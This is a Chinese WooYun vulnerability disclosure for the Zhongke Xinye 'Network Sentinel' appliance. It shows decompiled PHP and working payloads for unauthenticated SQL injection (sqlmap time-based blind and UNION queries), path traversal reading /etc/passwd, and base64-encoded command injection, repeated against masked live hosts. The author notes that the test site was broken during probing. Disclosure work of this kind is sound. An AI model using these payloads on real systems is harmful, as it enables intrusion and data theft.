当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2015-123366

漏洞标题: 中科新业网络哨兵 多处sql注射/命令执行/文件下载

相关厂商: 中科新业

漏洞作者: menmen519

提交时间: 2015-07-02 11:29

公开时间: 2015-10-01 13:38

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 11

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码分析

1人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-06: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

中科新业网络哨兵 两处sql注射/全局导出越权

详细说明:

changauthprioritystatus.php:

code 区域
session_start( );


include( "../include/globalvar.h" );


include( "../include/connectdb.php" );


include( "../include/addsystemlog.php" );


include( "../include/common.php" );


$sql = "UPDATE tab_sysconfig SET configval='Y' WHERE configid='gIsGlobalAuth' LIMIT 1";


$gDb->query( $sql );


$sql = "SELECT is_active, seq FROM tab_auth_priority WHERE id={$par} LIMIT 1";


$gDb->query( $sql );


$gDb->next_record( );


$i = $gDb->Record['is_active'];


$s = $gDb->Record['seq'];


$sql = "SELECT max(seq) FROM tab_auth_priority WHERE is_active=1";


$gDb->query( $sql );


$gDb->next_record( );


$m = !$gDb->Record[0] ? 0 : $gDb->Record[0];


$sql = "UPDATE tab_auth_priority SET is_active=(is_active+1)%2 WHERE id=".$par." LIMIT 1";


$gDb->query( $sql );


if ( $i )


{


				$sql = "UPDATE tab_auth_priority SET seq=(seq-1) WHERE seq>{$s}";


				$gDb->query( $sql );


}


else


{


				$sql = "UPDATE tab_auth_priority SET seq=(seq-1) WHERE seq={$m}";


}


$sql = "UPDATE tab_auth_priority SET seq='100' WHERE is_active=0";


$gDb->query( $sql );


$sql = "UPDATE tab_sysconfig SET configval = 'N' WHERE configid = 'gIsGlobalIPRange'";


$gDb->query( $sql );


$sql = "UPDATE tab_auth_priority SET seq=({$m}+1) WHERE id={$par} LIMIT 1";


if ( $gDb->query( $sql ) )


{


				echo "TRUE";


}


else


{


				echo "FALSE";


}


?>





这里面$sql = "SELECT is_active, seq FROM tab_auth_priority WHERE id={$par} LIMIT 1";



[23:24:52] [INFO] checking if the injection point on GET parameter 'par' is a false positive

GET parameter 'par' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection points with a total of 104 HTTP(s) requests:

---

Parameter: par (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: par=xx AND (SELECT * FROM (SELECT(SLEEP(5)))OQqx)

---

[23:26:17] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL 5.0.12

[23:26:17] [INFO] fetched data logged to text files under '/tmp/sqlmappOSEjC29678/sqlmapoutputQkCdon'



[*] shutting down at 23:26:17







我们可以用这样的去猜测 可能时间花费更少一些

**.**.**.**/ucenter/include/changauthprioritystatus.php?par=if(ascii(substr((select user()),1,1))=114,1,sleep(0.3))





下来同样的原理



changauthprioritystatus_ucwiz.php:

code 区域
session_start( );


require_once( "../../../include/globalvar.h" );


require_once( "../../../include/dbclass.php" );


require_once( "../../../include/hotelfunction.php" );


$gDb = new MyDB_Sql( $gMysql_host_name, $gMysql_db_name, $gMysql_user_name, $gMysql_user_password );


$sql = "UPDATE tab_sysconfig_mcwiz SET configval='Y' WHERE configid='gIsGlobalAuth' LIMIT 1";


$gDb->query( $sql );


$sql = "SELECT is_active, seq FROM tab_auth_priority_mcwiz WHERE id={$par} LIMIT 1";





这里虽然位于admin下面但是,也是无权限验证







下来我们看,越权行为,无需登录即可触发



**.**.**.**/ucenter/main/zkxy.php?gProgramId=exportreport&gModuleId=tjbb&con=op_id:operater:op_object:op_time:op_type:op_desc:op_ip:op_result&dataHeaderStr=op_id:%D0%F2%BA%C5::Y|operater:%D3%C3%BB%A7%C3%FB::Y|op_object:%B2%D9%D7%F7%B6%D4%CF%F3::Y|op_time:%B2%D9%D7%F7%CA%B1%BC%E4::Y|op_type:%D3%C3%BB%A7%D0%D0%CE%AA%7Cop_desc:%C3%E8%CA%F6::Y|op_ip:%D3%C3%BB%A7IP::Y|op_result:%B2%D9%D7%F7%BD%E1%B9%FB&gFlag=systemlog&gFileType=txt



gFileType 可以是

<select name="filetype">

<option value="txt">TXT格式</option>

<option value="rtf">RTF格式</option>

<option value="html">HTML格式</option>

<option value="csv">CSV格式</option>

<option value="xls">EXCEL格式</option>

<option value="pdf">PDF格式</option>

</select>









eg:

**.**.**.**/ucenter/main/zkxy.php?gProgramId=exportreport&gModuleId=tjbb&con=op_id:operater:op_object:op_time:op_type:op_desc:op_ip:op_result&dataHeaderStr=op_id:%D0%F2%BA%C5::Y|operater:%D3%C3%BB%A7%C3%FB::Y|op_object:%B2%D9%D7%F7%B6%D4%CF%F3::Y|op_time:%B2%D9%D7%F7%CA%B1%BC%E4::Y|op_type:%D3%C3%BB%A7%D0%D0%CE%AA%7Cop_desc:%C3%E8%CA%F6::Y|op_ip:%D3%C3%BB%A7IP::Y|op_result:%B2%D9%D7%F7%BD%E1%B9%FB&gFlag=systemlog&gFileType=txt



**.**.**.**/ucenter/main/zkxy.php?gProgramId=exportreport&gModuleId=tjbb&con=op_id:operater:op_object:op_time:op_type:op_desc:op_ip:op_result&dataHeaderStr=op_id:%D0%F2%BA%C5::Y|operater:%D3%C3%BB%A7%C3%FB::Y|op_object:%B2%D9%D7%F7%B6%D4%CF%F3::Y|op_time:%B2%D9%D7%F7%CA%B1%BC%E4::Y|op_type:%D3%C3%BB%A7%D0%D0%CE%AA%7Cop_desc:%C3%E8%CA%F6::Y|op_ip:%D3%C3%BB%A7IP::Y|op_result:%B2%D9%D7%F7%BD%E1%B9%FB&gFlag=systemlog&gFileType=txt



**.**.**.**/ucenter/main/zkxy.php?gProgramId=exportreport&gModuleId=tjbb&con=op_id:operater:op_object:op_time:op_type:op_desc:op_ip:op_result&dataHeaderStr=op_id:%D0%F2%BA%C5::Y|operater:%D3%C3%BB%A7%C3%FB::Y|op_object:%B2%D9%D7%F7%B6%D4%CF%F3::Y|op_time:%B2%D9%D7%F7%CA%B1%BC%E4::Y|op_type:%D3%C3%BB%A7%D0%D0%CE%AA%7Cop_desc:%C3%E8%CA%F6::Y|op_ip:%D3%C3%BB%A7IP::Y|op_result:%B2%D9%D7%F7%BD%E1%B9%FB&gFlag=systemlog&gFileType=txt



https://**.**.**.**/ucenter/main/zkxy.php?gProgramId=exportreport&gModuleId=tjbb&con=op_id:operater:op_object:op_time:op_type:op_desc:op_ip:op_result&dataHeaderStr=op_id:%D0%F2%BA%C5::Y|operater:%D3%C3%BB%A7%C3%FB::Y|op_object:%B2%D9%D7%F7%B6%D4%CF%F3::Y|op_time:%B2%D9%D7%F7%CA%B1%BC%E4::Y|op_type:%D3%C3%BB%A7%D0%D0%CE%AA%7Cop_desc:%C3%E8%CA%F6::Y|op_ip:%D3%C3%BB%A7IP::Y|op_result:%B2%D9%D7%F7%BD%E1%B9%FB&gFlag=systemlog&gFileType=txt



**.**.**.**/ucenter/main/zkxy.php?gProgramId=exportreport&gModuleId=tjbb&con=op_id:operater:op_object:op_time:op_type:op_desc:op_ip:op_result&dataHeaderStr=op_id:%D0%F2%BA%C5::Y|operater:%D3%C3%BB%A7%C3%FB::Y|op_object:%B2%D9%D7%F7%B6%D4%CF%F3::Y|op_time:%B2%D9%D7%F7%CA%B1%BC%E4::Y|op_type:%D3%C3%BB%A7%D0%D0%CE%AA%7Cop_desc:%C3%E8%CA%F6::Y|op_ip:%D3%C3%BB%A7IP::Y|op_result:%B2%D9%D7%F7%BD%E1%B9%FB&gFlag=systemlog&gFileType=txt





**.**.**.**/ucenter/include/changauthprioritystatus.php?par=xx AND (SELECT * FROM (SELECT(SLEEP(5)))OQqx)

https://**.**.**.**//ucenter/include/changauthprioritystatus.php?par=xx AND (SELECT * FROM (SELECT(SLEEP(5)))OQqx)

**.**.**.**/ucenter/include/changauthprioritystatus.php?par=xx AND (SELECT * FROM (SELECT(SLEEP(5)))OQqx)

**.**.**.**//ucenter/include/changauthprioritystatus.php?par=xx AND (SELECT * FROM (SELECT(SLEEP(5)))OQqx)



**.**.**.**/ucenter/include/changauthprioritystatus.php?par=xx AND (SELECT * FROM (SELECT(SLEEP(5)))OQqx)





命令执行:

admin/export.php:

code 区域
<?php


/*********************/


/*                   */


/*  Dezend for PHP5  */


/*         NWS       */


/*      Nulled.WS    */


/*                   */


/*********************/





include( "../include/globalvar.h" );


if ( $kind == "log" )


{


				$gFilePath = $gNetGuardLogFilePath;


				$fileContent = file_get_contents( $gFilePath.$filename );


}


else if ( $gCommand == "zero_tools" )


{


				$base_dir = $gFileTransferSavePath."tools";


				$tmp = array( );


				exec( "./syscommand \"".$base_dir.base64_decode( $cmd )."\"", $tmp );


				$fileContent = join( "\r\n", $tmp );


				$filename = $gCommand.".txt";


}


else


{


				$tmp = array( );


				exec( "./syscommand \"".$gCommand."\"", $tmp );


				$fileContent = join( "\r\n", $tmp );


				$filename = $gCommand.".txt";


}


header( "Content-Disposition: attachment; filename=\"".$filename."\"" );


echo $fileContent;


?>







文件下载:

**.**.**.**/ucenter/admin/export.php?kind=log&gNetGuardLogFilePath=&filename=../../../../../../../../etc/passwd



3.png







命令为" & cat /etc/passwd & "

url:

**.**.**.**/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D



返回来的文件内容就是命令执行后读取的文件



**.**.**.**/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D

**.**.**.**/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D



**.**.**.**//ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D



https://**.**.**.**/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D



**.**.**.**/ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGNhdCAvZXRjL3Bhc3N3ZCAmICI%3D



admin/addmacwhitelist.php

code 区域
session_start( );


header( "Expires: Mon, 26 Jul 2000 05:00:00 GMT" );


header( "Last-Modified: ".gmdate( "D, d M Y H:i:s" )."GMT" );


header( "Cache-Control: no-cache, must-revalidate" );


header( "Pragma: no-cache" );


include( "../include/globalvar.h" );


include( "../include/connectdb.php" );


if ( $gUpd == "E" )


{


				$sql = "SELECT * FROM tab_mac_white_list WHERE id = {$id}";


				$gDb->query( $sql );


				while ( $gDb->next_record( ) )


				{


								$mac = $gDb->Record['mac'];


								$remark = $gDb->Record['remark'];


								$gButText = "修 改";


				}


}


else


{


				$gButText = "添 加";


}







发送url:

**.**.**.**/ucenter/admin/addmacwhitelist.php?gUpd=E&id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b716b71,user(),0x7162767171)--



3.png







命令执行:

admin/exchange.php:

code 区域
session_start( );


header( "Content-Type: text/html; charset=GB2312" );


include( "../include/globalvar.h" );


include( "../include/connectdb.php" );


require_once( "../include/WriteLog.php" );


unset( $tmp );


$sysv = $_GET['sys'];


if ( $sysv )


{


				$cmdBody = "../include/globalvar.h //[系统名称定义] \\\\\\\$gCurVersion '\\\"".$sysv."\\\";'";


				writelog( "下面执行命令:", "./syscommand \"./confmod ".$cmdBody."\"" );


				exec( "./syscommand \"./confmod ".$cmdBody."\"", $temp );









第二处:

code 区域
echo "<!--  2011.11.04 Tchenko    -->\r\n";


if ( $_GET['gPara'] == 2 )


{


				exec( "./syscommand \"grep serial /boot/grub/grub.conf\"", $tmp );


				$y = "";


				$n = "";


				if ( $tmp[0] )


				{


								$y = "checked=\"checked\"";


								$stat = "开启";


				}


				else


				{


								$n = "checked=\"checked\"";


								$stat = "关闭";


				}


				echo "\r\n <form action=\"w_config.php\" method=\"get\">\r\n  <div><font color=\"#0000FF\">当前串口状态为【<font color=\"#FF0000\">";


				echo $stat;


				echo "</font>】</font></div><br>\r\n  <div><font color=\"#999999\">串口参数\r\n   <br>\r\n   波 特 率:9600&nbsp;&nbsp 数据位:8  \r\n   <br>\r\n   奇偶校验:无  &nbsp;&nbsp;&nbsp; 停止位:1</font>\r\n  </div><br>\r\n  <div style=\"height:20px;\">串口控制设置</div>\r\n  <div><label for=\"y\">开启:</label><input type=\"radio\" name=\"gPara\" id=\"y\" value=\"1\" ";


				echo $y;


				echo "></div>\r\n  <div style=\"height:30px;\"><label for=\"n\">关闭:</label><input type=\"radio\" name=\"gPara\" id=\"n\" value=\"0\" ";


				echo $n;


				echo "></div>\r\n  <div><input type=\"submit\" value=\"保存设置\" onClick=\"return sc_switch()\"></div>\r\n </form> \r\n ";


				echo "<s";


				echo "cript language=\"javascript\">\r\n   function sc_switch(){\r\n      if(document.getElementById('y').checked) str = \"您确定启动串口开关吗?\";\r\n\t  if(document.getElementById('n').checked) str = \"您确定关闭串口开关吗?\";\r\n\t  return confirm(str);\r\n   }\r\n </script>\r\n";


}


else


{


				exec( "./syscommand \"sh /usr/seentech/netguard/shell/COM/config_console.sh -r".$_GET['gPara']."\"", $tmp );


				if ( $tmp[0] )











命令执行 这里就不多解释了



eg:

**.**.**.**/ucenter/admin/addmacwhitelist.php?gUpd=E&id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b716b71,user(),0x7162767171)--

**.**.**.**/ucenter/admin/addmacwhitelist.php?gUpd=E&id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b716b71,user(),0x7162767171)--

**.**.**.**/ucenter/admin/addmacwhitelist.php?gUpd=E&id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b716b71,user(),0x7162767171)--

https://**.**.**.**/ucenter/admin/addmacwhitelist.php?gUpd=E&id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b716b71,user(),0x7162767171)--



再次给道个歉,测试站点被测试坏了,哎,差点吓尿了,期初以为删了站点,现在看来是某个命令执行,导致删除了某个配置文件导致,最后补充,这个功能好像不是所有的产品都具有的,只有一部分



漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-03 13:37

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录